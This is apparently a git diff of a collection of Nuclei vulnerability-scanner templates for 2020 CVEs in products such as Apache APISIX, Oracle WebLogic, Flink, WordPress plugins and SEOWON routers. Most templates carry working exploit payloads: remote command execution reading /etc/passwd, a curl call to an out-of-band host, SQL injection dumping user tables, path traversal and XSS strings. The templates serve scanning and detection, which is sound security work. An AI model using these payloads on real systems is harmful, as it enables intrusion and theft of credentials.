7.5 + cve-id: CVE-2020-13405 + cwe-id: CWE-306 + epss-score: 0.01002 + epss-percentile: 0.81964 + cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 3 + vendor: microweber + product: microweber + shodan-query: http.html:"microweber" + tags: cve,cve2020,microweber,unauth,disclosure + +http: + - raw: + - | + POST /module/ HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + Referer: {{BaseURL}}admin/view:modules/load_module:users + + module={{endpoint}} + + payloads: + endpoint: + - "users/controller" + - "modules/users/controller" + - "/modules/users/controller" + matchers: + - type: dsl + dsl: + - 'contains(body,"username")' + - 'contains(body,"password")' + - 'contains(body,"password_reset_hash")' + - 'status_code==200' + - 'contains(header,"text/html")' + condition: and +# digest: 4a0a0047304502203be4d7f5e6cf689779af0571cd7edda9bf8975e0a39de1da9a717cdacffd438c022100c9e14eb45b1c3245277acdf5ad2abab89ea79fd9fac04a3de2d9acfd1d80f272:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/cve-2020-13937.yaml b/nuclei-templates/CVE-2020/cve-2020-13937.yaml new file mode 100644 index 0000000000..28936101f5 --- /dev/null +++ b/nuclei-templates/CVE-2020/cve-2020-13937.yaml @@ -0,0 +1,47 @@ +id: CVE-2020-13937 + +info: + name: Apache Kylin Unauth + author: pikpikcu + severity: medium + description: | + Apache Kylin 2.0.0, 2.1.0, 2.2.0, 2.3.0, 2.3.1, 2.3.2, 2.4.0, + 2.4.1, 2.5.0, 2.5.1, 2.5.2, 2.6.0, 2.6.1, 2.6.2, 2.6.3, 2.6.4, + 2.6.5, 2.6.6, 3.0.0-alpha, 3.0.0-alpha2, 3.0.0-beta, 3.0.0, 3.0.1, + 3.0.2, 3.1.0, 4.0.0-alpha has one restful api which exposed + Kylin's configuration information without any authentication, + so it is dangerous because some confidential information entries will be disclosed to everyone. + reference: + - https://kylin.apache.org/docs/release_notes.html + - https://s.tencent.com/research/bsafe/1156.html + tags: cve,cve2020,apache + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2020-13937 + cwe-id: CWE-922 + +requests: + - method: GET + path: + - "{{BaseURL}}/kylin/api/admin/config" + headers: + Content-Type: application/json + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "application/json" + part: header + + - type: word + words: + - config + - kylin.metadata.url + condition: and + part: body diff --git a/nuclei-templates/CVE-2020/cve-2020-13945.yaml b/nuclei-templates/CVE-2020/cve-2020-13945.yaml new file mode 100644 index 0000000000..f8d7d2dc80 --- /dev/null +++ b/nuclei-templates/CVE-2020/cve-2020-13945.yaml @@ -0,0 +1,56 @@ +id: CVE-2020-13945 + +info: + name: Apache APISIX's Admin API Default Access Token (RCE) + author: pdteam + severity: medium + description: In Apache APISIX, the user enabled the Admin API and deleted the Admin API access IP restriction rules. Eventually, the default token is allowed to access APISIX management data. This affects versions 1.2, 1.3, 1.4, 1.5. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2020-13945 + - https://github.com/vulhub/vulhub/tree/master/apisix/CVE-2020-13945 + tags: cve,cve2020,apache,apisix,rce,intrusive + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N + cvss-score: 6.50 + cve-id: CVE-2020-13945 + +requests: + - raw: + - | + POST /apisix/admin/routes HTTP/1.1 + Host: {{Hostname}} + X-API-KEY: edd1c9f034335f136f87ad84b625c8f1 + Content-Type: application/json + + { + "uri":"/{{randstr}}", + "script":"local _M = {} \n function _M.access(conf, ctx) \n local os = require('os')\n local args = assert(ngx.req.get_uri_args()) \n local f = assert(io.popen(args.cmd, 'r'))\n local s = assert(f:read('*a'))\n ngx.say(s)\n f:close() \n end \nreturn _M", + "upstream":{ + "type":"roundrobin", + "nodes":{ + "example.com:80":1 + } + } + } + + - | + GET /{{randstr}}?cmd=id HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + words: + - '"action":"create"' + - '"script":' + - '"node":' + condition: and + + - type: status + status: + - 201 + + extractors: + - type: regex + regex: + - "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)" diff --git a/nuclei-templates/CVE-2020/cve-2020-14092.yaml b/nuclei-templates/CVE-2020/cve-2020-14092.yaml new file mode 100644 index 0000000000..26696c0027 --- /dev/null +++ b/nuclei-templates/CVE-2020/cve-2020-14092.yaml @@ -0,0 +1,38 @@ +id: CVE-2020-14092 + +info: + name: WordPress Payment Form For Paypal Pro Unauthenticated SQL Injection + author: princechaddha + severity: critical + description: WordPress Payment Form For Paypal Pro 'query' parameter allows for any unauthenticated user to perform SQL queries with result output to a web page in JSON format. + reference: https://wpscan.com/vulnerability/10287 + tags: cve,cve2020,wordpress,wp-plugin,sqli,paypal + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-14092 + cwe-id: CWE-89 + +requests: + - method: GET + path: + - "{{BaseURL}}/?cffaction=get_data_from_database&query=SELECT%20*%20from%20wp_users" + + matchers-condition: and + matchers: + - type: word + words: + - "text/html" + part: header + - type: word + words: + - '"user_login"' + - '"user_email"' + - '"user_pass"' + - '"user_activation_key"' + condition: and + part: body + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2020/cve-2020-14413.yaml b/nuclei-templates/CVE-2020/cve-2020-14413.yaml new file mode 100644 index 0000000000..e260ce4ca9 --- /dev/null +++ b/nuclei-templates/CVE-2020/cve-2020-14413.yaml @@ -0,0 +1,36 @@ +id: CVE-2020-14413 + +info: + name: NeDi 1.9C XSS + author: pikpikcu + severity: medium + reference: https://gist.github.com/farid007/8db2ab5367ba00e87f9479b32d46fea8 + description: NeDi 1.9C is vulnerable to XSS because of an incorrect implementation of sanitize() in inc/libmisc.php. This function attempts to escape the SCRIPT tag from user-controllable values, but can be easily bypassed, as demonstrated by an onerror attribute of an IMG element as a Devices-Config.php?sta= value. + tags: cve,cve2020,nedi,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-14413 + cwe-id: CWE-79 + +requests: + - method: GET + path: + - '{{BaseURL}}/Devices-Config.php?sta=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E' + + matchers-condition: and + matchers: + + - type: word + words: + - "" + part: body + + - type: status + status: + - 200 + + - type: word + part: header + words: + - "text/html" \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/cve-2020-14864.yaml b/nuclei-templates/CVE-2020/cve-2020-14864.yaml new file mode 100644 index 0000000000..e2e0206f06 --- /dev/null +++ b/nuclei-templates/CVE-2020/cve-2020-14864.yaml @@ -0,0 +1,30 @@ +id: CVE-2020-14864 +info: + name: Oracle Fusion - "getPreviewImage" Directory Traversal/Local File Inclusion + description: 'Oracle Business Intelligence Enterprise Edition 5.5.0.0.0 / 12.2.1.3.0 / 12.2.1.4.0 - "getPreviewImage" Directory Traversal/Local File Inclusion' + author: Ivo Palazzolo (@palaziv) + severity: high + tags: cve,cve2020,oracle,lfi + reference: + - http://packetstormsecurity.com/files/159748/Oracle-Business-Intelligence-Enterprise-Edition-5.5.0.0.0-12.2.1.3.0-12.2.1.4.0-LFI.html + - https://www.oracle.com/security-alerts/cpuoct2020.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2020-14864 + +requests: + - method: GET + path: + - '{{BaseURL}}/analytics/saw.dll?bieehome&startPage=1' # grab autologin cookies + - '{{BaseURL}}/analytics/saw.dll?getPreviewImage&previewFilePath=/etc/passwd' + cookie-reuse: true + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: regex + regex: + - 'root:.*:0:0' + part: body \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/cve-2020-14882.yaml b/nuclei-templates/CVE-2020/cve-2020-14882.yaml deleted file mode 100644 index d43e630199..0000000000 --- a/nuclei-templates/CVE-2020/cve-2020-14882.yaml +++ /dev/null @@ -1,46 +0,0 @@ -id: CVE-2020-14882 - -info: - name: Oracle WebLogic Server Unauthenticated RCE (and Patch Bypass) - author: dwisiswant0 - severity: critical - reference: - - https://testbnull.medium.com/weblogic-rce-by-only-one-get-request-cve-2020-14882-analysis-6e4b09981dbf - - https://twitter.com/jas502n/status/1321416053050667009 - - https://youtu.be/JFVDOIL0YtA - - https://github.com/jas502n/CVE-2020-14882#eg - description: | - Vulnerability in the Oracle WebLogic Server - product of Oracle Fusion Middleware (component: Console). - Supported versions that are affected are 10.3.6.0.0, - 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. - Easily exploitable vulnerability allows unauthenticated - attacker with network access via HTTP to compromise the server. - Successful attacks of this vulnerability can result in takeover. - tags: cve,cve2020,oracle,rce,weblogic,oast - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 - cve-id: CVE-2020-14882 - -requests: - - raw: - - | - POST /console/images/%252e%252e%252fconsole.portal HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded; charset=utf-8 - - _nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("http://{{interactsh-url}}") - - matchers-condition: and - matchers: - - - type: word - part: header - words: - - "ADMINCONSOLESESSION" - - - type: word - part: interactsh_protocol - words: - - "http" \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/cve-2020-14883.yaml b/nuclei-templates/CVE-2020/cve-2020-14883.yaml new file mode 100644 index 0000000000..92e76199c0 --- /dev/null +++ b/nuclei-templates/CVE-2020/cve-2020-14883.yaml @@ -0,0 +1,36 @@ +id: CVE-2020-14883 + +info: + name: Oracle WebLogic Server Administration Console Handle RCE + author: pdteam + severity: high + description: Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware. Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows high privileged attackers with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. + reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14883 + tags: cve,cve2020,oracle,rce,weblogic + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.20 + cve-id: CVE-2020-14883 + +requests: + - method: POST + path: + - "{{BaseURL}}/console/images/%252e%252e%252fconsole.portal" + headers: + Content-Type: application/x-www-form-urlencoded + Test-Header: cat /etc/passwd + + body: | + test_handle=com.tangosol.coherence.mvel2.sh.ShellSession('weblogic.work.ExecuteThread currentThread = (weblogic.work.ExecuteThread)Thread.currentThread(); weblogic.work.WorkAdapter adapter = currentThread.getCurrentWork(); java.lang.reflect.Field field = adapter.getClass().getDeclaredField("connectionHandler");field.setAccessible(true);Object obj = field.get(adapter);weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl)obj.getClass().getMethod("getServletRequest").invoke(obj); String cmd = req.getHeader("Test-Header");String[] cmds = System.getProperty("os.name").toLowerCase().contains("window") ? new String[]{"cmd.exe", "/c", cmd} : new String[]{"/bin/sh", "-c", cmd};if(cmd != null ){ String result = new java.util.Scanner(new java.lang.ProcessBuilder(cmds).start().getInputStream()).useDelimiter("\\A").next(); weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl)req.getClass().getMethod("getResponse").invoke(req);res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));res.getServletOutputStream().flush();} currentThread.interrupt();') + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + condition: and + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2020/CVE-2020-15004.yaml b/nuclei-templates/CVE-2020/cve-2020-15004.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-15004.yaml rename to nuclei-templates/CVE-2020/cve-2020-15004.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-15500.yaml b/nuclei-templates/CVE-2020/cve-2020-15500.yaml deleted file mode 100644 index b197b0e2de..0000000000 --- a/nuclei-templates/CVE-2020/cve-2020-15500.yaml +++ /dev/null @@ -1,37 +0,0 @@ -id: CVE-2020-15500 - -info: - name: TileServer GL Reflected XSS - author: Akash.C - severity: medium - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2020-15500 - - https://github.com/maptiler/tileserver-gl/issues/461 - tags: cve,cve2020,xss,tileserver - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 - cve-id: CVE-2020-15500 - cwe-id: CWE-79 - description: "An issue was discovered in server.js in TileServer GL through 3.0.0. The content of the key GET parameter is reflected unsanitized in an HTTP response for the application's main page, causing reflected XSS." - -requests: - - method: GET - path: - - '{{BaseURL}}/?key=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss%27%29%3E' - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - part: header - words: - - "text/html" - - - type: word - words: - - "'>\"" - part: body \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/cve-2020-15920.yaml b/nuclei-templates/CVE-2020/cve-2020-15920.yaml new file mode 100644 index 0000000000..983229407e --- /dev/null +++ b/nuclei-templates/CVE-2020/cve-2020-15920.yaml @@ -0,0 +1,28 @@ +id: CVE-2020-15920 + +info: + name: Unauthenticated RCE at Mida eFramework on 'PDC/ajaxreq.php' + author: dwisiswant0 + severity: critical + description: There is an OS Command Injection in Mida eFramework through 2.9.0 that allows an attacker to achieve Remote Code Execution (RCE) with administrative (root) privileges. No authentication is required. + reference: https://elbae.github.io/jekyll/update/2020/07/14/vulns-01.html + tags: cve,cve2020,mida,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-15920 + cwe-id: CWE-78 + +requests: + - method: POST + path: + - "{{BaseURL}}/PDC/ajaxreq.php?PARAM=127.0.0.1+-c+0%3B+cat+%2Fetc%2Fpasswd&DIAGNOSIS=PING" + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: regex + regex: + - "root:.*:0:0:" + part: body diff --git a/nuclei-templates/CVE-2020/cve-2020-17456.yaml b/nuclei-templates/CVE-2020/cve-2020-17456.yaml new file mode 100644 index 0000000000..b7e29cd0a0 --- /dev/null +++ b/nuclei-templates/CVE-2020/cve-2020-17456.yaml @@ -0,0 +1,71 @@ +id: CVE-2020-17456 + +info: + name: SEOWON INTECH SLC-130 & SLR-120S - Unauthenticated Remote Code Execution + author: gy741,edoardottt + severity: critical + description: SEOWON INTECH SLC-130 and SLR-120S devices allow remote code execution via the ipAddr parameter to the system_log.cgi page. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected device. + remediation: | + Apply the latest firmware update provided by the vendor to mitigate this vulnerability. + reference: + - https://maj0rmil4d.github.io/Seowon-SlC-130-And-SLR-120S-Exploit/ + - https://nvd.nist.gov/vuln/detail/CVE-2020-17456 + - http://packetstormsecurity.com/files/158933/Seowon-SlC-130-Router-Remote-Code-Execution.html + - http://packetstormsecurity.com/files/166273/Seowon-SLR-120-Router-Remote-Code-Execution.html + - https://www.exploit-db.com/exploits/50821 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2020-17456 + cwe-id: CWE-78 + epss-score: 0.96263 + epss-percentile: 0.99495 + cpe: cpe:2.3:o:seowonintech:slc-130_firmware:-:*:*:*:*:*:*:* + metadata: + max-request: 2 + vendor: seowonintech + product: slc-130_firmware + tags: cve,cve2020,seowon,oast,packetstorm,rce,router,unauth,iot,seowonintech +variables: + useragent: '{{rand_base(6)}}' + +http: + - raw: + - | + POST /cgi-bin/login.cgi HTTP/1.1 + Host: {{Hostname}} + Origin: {{BaseURL}} + Referer: {{BaseURL}} + Content-Type: application/x-www-form-urlencoded + + browserTime=081119502020¤tTime=1597159205&expires=Wed%252C%2B12%2BAug%2B2020%2B15%253A20%253A05%2BGMT&Command=Submit&user=admin&password=admin + - | + POST /cgi-bin/system_log.cgi HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + Command=Diagnostic&traceMode=ping&reportIpOnly=&pingIpAddr=;curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'&pingPktSize=56&pingTimeout=30&pingCount=4&maxTTLCnt=30&queriesCnt=3&reportIpOnlyCheckbox=on&logarea=com.cgi&btnApply=Apply&T=1646950471018 + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol + words: + - "http" + + - type: word + part: interactsh_request + words: + - "User-Agent: {{useragent}}" + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 +# digest: 4a0a00473045022100dfd063b9fa64a8c67ede0a35c9c5ef23fc7ffd9b31d32de5343eaa430bd12815022063f498b2e3e49255cc16b78a9ae2e77f66144915d845e6feae3ced267930d7a9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/cve-2020-17505.yaml b/nuclei-templates/CVE-2020/cve-2020-17505.yaml new file mode 100644 index 0000000000..66a697edcf --- /dev/null +++ b/nuclei-templates/CVE-2020/cve-2020-17505.yaml @@ -0,0 +1,41 @@ +id: CVE-2020-17505 + +info: + name: Artica Web Proxy 4.30 OS Command Injection + author: dwisiswant0 + severity: high + description: Artica Web Proxy 4.30.000000 allows an authenticated remote attacker to inject commands via the service-cmds parameter in cyrus.php. These commands are executed with root privileges via service_cmds_peform. + tags: cve,cve2020,rce,artica,proxy + reference: https://blog.max0x4141.com/post/artica_proxy/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.80 + cve-id: CVE-2020-17505 + cwe-id: CWE-78 + +requests: + - raw: + - | + GET /fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27; HTTP/1.1 + Host: {{Hostname}} + Accept: */* + + - | + GET /cyrus.index.php?service-cmds-peform=%7C%7Cwhoami%7C%7C HTTP/1.1 + Host: {{Hostname}} + Accept: */* + + cookie-reuse: true + matchers-condition: and + matchers: + - type: word + words: + - "array(2)" + - "Position: ||whoami||" + - "root" + condition: and + + part: body + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2020/cve-2020-17518.yaml b/nuclei-templates/CVE-2020/cve-2020-17518.yaml new file mode 100644 index 0000000000..8d102b311e --- /dev/null +++ b/nuclei-templates/CVE-2020/cve-2020-17518.yaml @@ -0,0 +1,39 @@ +id: CVE-2020-17518 + +info: + name: Apache Flink Upload Path Traversal + author: pdteam + severity: high + reference: https://github.com/vulhub/vulhub/tree/master/flink/CVE-2020-17518 + description: | + Apache Flink 1.5.1 introduced a REST handler that allows you to write an uploaded file to an arbitrary location on the local file system, + through a maliciously modified HTTP HEADER. + tags: cve,cve2020,apache,lfi,flink,upload + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N + cvss-score: 7.50 + cve-id: CVE-2020-17518 + cwe-id: CWE-22 + +requests: + - raw: + - | + POST /jars/upload HTTP/1.1 + Host: {{Hostname}} + Accept: */* + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryoZ8meKnrrso89R6Y + + ------WebKitFormBoundaryoZ8meKnrrso89R6Y + Content-Disposition: form-data; name="jarfile"; filename="../../../../../../../tmp/poc" + + test-poc + ------WebKitFormBoundaryoZ8meKnrrso89R6Y-- + + - method: GET + path: + - '{{BaseURL}}/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252ftmp%252fpoc' + + matchers: + - type: dsl + dsl: + - 'contains(body, "test-poc") && status_code == 200' # Using CVE-2020-17519 to confirm this. diff --git a/nuclei-templates/CVE-2020/cve-2020-19282.yaml b/nuclei-templates/CVE-2020/cve-2020-19282.yaml new file mode 100644 index 0000000000..729970b1ac --- /dev/null +++ b/nuclei-templates/CVE-2020/cve-2020-19282.yaml @@ -0,0 +1,38 @@ +id: CVE-2020-19282 + +info: + name: Jeesns 1.4.2 XSS + author: pikpikcu + severity: medium + description: Reflected cross-site scripting (XSS) vulnerability in Jeesns 1.4.2 allows attackers to execute arbitrary web scripts or HTML via a crafted payload in the system error message's text field. + reference: + - https://github.com/zchuanzhao/jeesns/issues/11 + - https://nvd.nist.gov/vuln/detail/CVE-2020-19282 + tags: cve,cve2020,jeesns,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-19282 + cwe-id: CWE-79 + +requests: + - method: GET + path: + - "{{BaseURL}}/error?msg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + + matchers-condition: and + matchers: + + - type: word + words: + - '' + part: body + + - type: status + status: + - 200 + + - type: word + part: header + words: + - text/html diff --git a/nuclei-templates/CVE-2020/cve-2020-19283.yaml b/nuclei-templates/CVE-2020/cve-2020-19283.yaml deleted file mode 100644 index 4bb18052e0..0000000000 --- a/nuclei-templates/CVE-2020/cve-2020-19283.yaml +++ /dev/null @@ -1,38 +0,0 @@ -id: CVE-2020-19283 - -info: - name: Jeesns newVersion Reflection XSS - author: pikpikcu - severity: medium - description: Reflected cross-site scripting (XSS) vulnerability in the /newVersion component of Jeesns 1.4.2 allows attackers to execute arbitrary web scripts or HTML. - reference: - - https://github.com/zchuanzhao/jeesns/issues/10 - - https://nvd.nist.gov/vuln/detail/CVE-2020-19283 - tags: cve,cve2020,jeesns,xss - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 - cve-id: CVE-2020-19283 - cwe-id: CWE-79 - -requests: - - method: GET - path: - - "{{BaseURL}}/newVersion?callback=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - - matchers-condition: and - matchers: - - - type: word - words: - - "" - part: body - - - type: status - status: - - 200 - - - type: word - part: header - words: - - text/html diff --git a/nuclei-templates/CVE-2020/cve-2020-1943.yaml b/nuclei-templates/CVE-2020/cve-2020-1943.yaml deleted file mode 100644 index 8b0c0bebf9..0000000000 --- a/nuclei-templates/CVE-2020/cve-2020-1943.yaml +++ /dev/null @@ -1,36 +0,0 @@ -id: CVE-2020-1943 - -info: - name: Apache OFBiz Reflected XSS - author: pdteam - description: Data sent with contentId to /control/stream is not sanitized, allowing XSS attacks in Apache OFBiz 16.11.01 to 16.11.07. - severity: medium - tags: cve,cve2020,apache,xss,ofbiz - reference: - - https://lists.apache.org/thread.html/rf867d9a25fa656b279b16e27b8ff6fcda689cfa4275a26655c685702%40%3Cdev.ofbiz.apache.org%3E - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 - cve-id: CVE-2020-1943 - cwe-id: CWE-79 - -requests: - - method: GET - path: - - '{{BaseURL}}/control/stream?contentId=%27\%22%3E%3Csvg/onload=alert(xss)%3E' - - matchers-condition: and - matchers: - - type: word - words: - - "" - part: body - - - type: word - words: - - "text/html" - part: header - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2020/cve-2020-19625.yaml b/nuclei-templates/CVE-2020/cve-2020-19625.yaml new file mode 100644 index 0000000000..ba85b67fc6 --- /dev/null +++ b/nuclei-templates/CVE-2020/cve-2020-19625.yaml @@ -0,0 +1,34 @@ +id: CVE-2020-19625 +info: + name: Gridx 1.3 RCE + author: geeknik + description: Remote Code Execution vulnerability in tests/support/stores/test_grid_filter.php in oria gridx 1.3, allows remote attackers to execute arbitrary code, via crafted value to the $query parameter. + reference: https://github.com/oria/gridx/issues/433 + severity: critical + tags: cve,cve2020,gridx,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-19625 + +requests: + - method: GET + path: + - "{{BaseURL}}/tests/support/stores/test_grid_filter.php?query=phpinfo();" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "PHP Extension" + - "PHP Version" + condition: and + extractors: + - type: regex + part: body + group: 1 + regex: + - '

    PHP Version ([0-9.]+)<\/h1>' diff --git a/nuclei-templates/CVE-2020/cve-2020-20988.yaml b/nuclei-templates/CVE-2020/cve-2020-20988.yaml deleted file mode 100644 index 07f450bdb6..0000000000 --- a/nuclei-templates/CVE-2020/cve-2020-20988.yaml +++ /dev/null @@ -1,56 +0,0 @@ -id: CVE-2020-20988 - -info: - name: DomainMOD 4.13.0 - Cross-Site Scripting - author: arafatansari - severity: medium - description: | - DomainMOD 4.13.0 is vulnerable to cross-site scripting via reporting/domains/cost-by-owner.php in the "or Expiring Between" parameter. - impact: | - Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. - remediation: | - Upgrade to the latest version of DomainMOD or apply the vendor-provided patch to mitigate this vulnerability. - reference: - - https://mycvee.blogspot.com/p/xss2.html - - https://nvd.nist.gov/vuln/detail/CVE-2020-20988 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N - cvss-score: 5.4 - cve-id: CVE-2020-20988 - cwe-id: CWE-79 - epss-score: 0.0009 - epss-percentile: 0.37789 - cpe: cpe:2.3:a:domainmod:domainmod:4.13.0:*:*:*:*:*:*:* - metadata: - verified: true - max-request: 2 - vendor: domainmod - product: domainmod - tags: cve2020,cve,domainmod,xss,authenticated - -http: - - raw: - - | - POST / HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - new_username={{username}}&new_password={{password}} - - | - POST /reporting/domains/cost-by-owner.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - daterange=%22%2F%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E - - host-redirects: true - max-redirects: 2 - matchers: - - type: dsl - dsl: - - 'status_code_2 == 200' - - 'contains(header_2, "text/html")' - - 'contains(body_2, "value=\"\"/>")' - - 'contains(body_2, "DomainMOD")' - condition: and -# digest: 4a0a00473045022100fbb0177d572dab76f291eb8c5192458be9114f6ff475722fe228667a0a17f96602207f0bf6ee4c83004d0e951aaadb9b2b40b09318391f86ca1b5a3629de44e3adfb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/cve-2020-2103.yaml b/nuclei-templates/CVE-2020/cve-2020-2103.yaml new file mode 100644 index 0000000000..5adba642ed --- /dev/null +++ b/nuclei-templates/CVE-2020/cve-2020-2103.yaml @@ -0,0 +1,67 @@ +id: CVE-2020-2103 + +info: + name: Jenkins <=2.218 - Information Disclosure + author: c-sh0 + severity: medium + description: Jenkins through 2.218, LTS 2.204.1 and earlier, is susceptible to information disclosure. An attacker can access exposed session identifiers on a user detail object in the whoAmI diagnostic page and thus potentially access sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to gain sensitive information from the Jenkins server. + remediation: | + Upgrade Jenkins to a version higher than 2.218 to mitigate the vulnerability. + reference: + - https://www.jenkins.io/security/advisory/2020-01-29/#SECURITY-1695 + - https://jenkins.io/security/advisory/2020-01-29/#SECURITY-1695 + - http://www.openwall.com/lists/oss-security/2020/01/29/1 + - https://nvd.nist.gov/vuln/detail/CVE-2020-2103 + - https://access.redhat.com/errata/RHBA-2020:0402 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2020-2103 + cwe-id: CWE-200 + epss-score: 0.00534 + epss-percentile: 0.76681 + cpe: cpe:2.3:a:jenkins:jenkins:*:*:*:*:lts:*:*:* + metadata: + max-request: 2 + vendor: jenkins + product: jenkins + shodan-query: http.favicon.hash:81586312 + tags: cve,cve2020,jenkins + +http: + - raw: + - | + GET {{BaseURL}}/whoAmI/ HTTP/1.1 + Host: {{Hostname}} + - | + GET {{BaseURL}}/whoAmI/ HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + part: header + words: + - 'text/html' + - 'x-jenkins' + case-insensitive: true + condition: and + + - type: word + part: body_2 + words: + - 'Cookie' + - 'SessionId: null' + condition: and + + - type: status + status: + - 200 + + extractors: + - type: kval + kval: + - x_jenkins +# digest: 490a0046304402204719e69a3d9212bc5a83bc0637aa260c0f1a472289337a06a0795d661772b79a02203d747ba49dfc9831db6ee04e4a534db4d514e8afd98b86e178e116bf4de12837:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/cve-2020-21224.yaml b/nuclei-templates/CVE-2020/cve-2020-21224.yaml deleted file mode 100644 index 4b25b87e1f..0000000000 --- 